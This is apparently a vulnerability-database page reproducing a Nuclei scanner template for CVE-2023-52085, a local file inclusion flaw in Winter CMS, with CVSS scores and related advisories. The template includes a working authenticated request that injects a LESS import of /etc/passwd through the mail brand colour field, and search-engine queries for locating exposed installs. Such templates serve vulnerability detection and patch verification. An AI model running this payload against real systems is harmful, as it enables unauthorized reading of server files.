Lucene search
ProjectDiscoveryNUCLEI:CVE-2023-52085HistoryFeb 02, 2024 - 10:08 a.m.
Winter CMS Local File Inclusion - (LFI)
2024-02-0210:08:58
ProjectDiscovery
github.com
14
cve2023
authenticated
wintercms
colorpicker
fileinclusion
5.4 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
4.4 Medium
AI Score
Confidence
High
0.003 Low
EPSS
Percentile
67.9%
Winter is a free, open-source content management system. Users with access to backend forms that include a ColorPicker FormWidget can provide a value that would then be included without further processing in the compilation of custom stylesheets via LESS. This had the potential to lead to a Local File Inclusion vulnerability. This issue has been patched in v1.2.4.
id: CVE-2023-52085
info:
name: Winter CMS Local File Inclusion - (LFI)
author: sanineng
severity: medium
description: |
Winter is a free, open-source content management system. Users with access to backend forms that include a ColorPicker FormWidget can provide a value that would then be included without further processing in the compilation of custom stylesheets via LESS. This had the potential to lead to a Local File Inclusion vulnerability. This issue has been patched in v1.2.4.
reference:
- https://github.com/wintercms/winter/security/advisories/GHSA-2x7r-93ww-cxrq
- https://nvd.nist.gov/vuln/detail/CVE-2023-52085
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2023-52085
cwe-id: CWE-22
epss-score: 0.00256
epss-percentile: 0.65415
cpe: cpe:2.3:a:wintercms:winter:*:*:*:*:*:*:*:*
metadata:
max-request: 4
vendor: wintercms
product: winter
shodan-query:
- "title:\"Winter CMS\""
- http.title:"winter cms"
fofa-query:
- "title=\"Winter CMS\""
- title="winter cms"
google-query: intitle:"winter cms"
tags: cve,cve2023,authenticated,lfi,wintercms
http:
- raw:
- |
GET /backend/backend/auth/signin HTTP/1.1
Host: {{Hostname}}
- |
POST /backend/backend/auth/signin HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
_token={{_token}}&postback=1&login={{username}}&password={{password}}
- |
POST /backend/system/mailbrandsettings HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-WINTER-REQUEST-HANDLER: onSave
X-WINTER-REQUEST-PARTIALS:
X-Requested-With: XMLHttpRequest
_token={{_token}}&MailBrandSetting%5Bbody_bg%5D=%2342445B;@import%20(inline)%20%22/etc/passwd%22&redirect=0
- |
GET /backend/system/mailbrandsettings HTTP/1.1
Host: {{Hostname}}
host-redirects: true
max-redirects: 3
matchers:
- type: regex
part: body_4
regex:
- "root:[x*]:0:0:"
extractors:
- type: regex
part: body
name: _token
group: 1
regex:
- '<input name="_token" type="hidden" value="([0-9a-zA-Z]{40})">'
internal: true
# digest: 490a0046304402200e104a483850d66787d611030336f222ee3d4972ef37c8039c12a483b4e5b2a60220155396fef3818a7af539443ef744dfc91bb98446c28034964a036156915641d5:922c64590222798bb761d5b6d8e72950Related
osv
osv
Winter CMS Local File Inclusion through Server Side Template Injection
2024-01-02 14:10:26
CVE-2023-52085
2023-12-29 00:15:50
veracode
veracode
Local File Inclusion
2023-12-29 08:38:47
nvd
nvd
CVE-2023-52085
2023-12-29 00:15:50
github
github
Winter CMS Local File Inclusion through Server Side Template Injection
2024-01-02 14:10:26
cve
cve
CVE-2023-52085
2023-12-29 00:15:50
prion
prion
Use after free
2023-12-29 00:15:00
cvelist
cvelist
5.4 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
4.4 Medium
AI Score
Confidence
High
0.003 Low
EPSS
Percentile
67.9%
Related for NUCLEI:CVE-2023-52085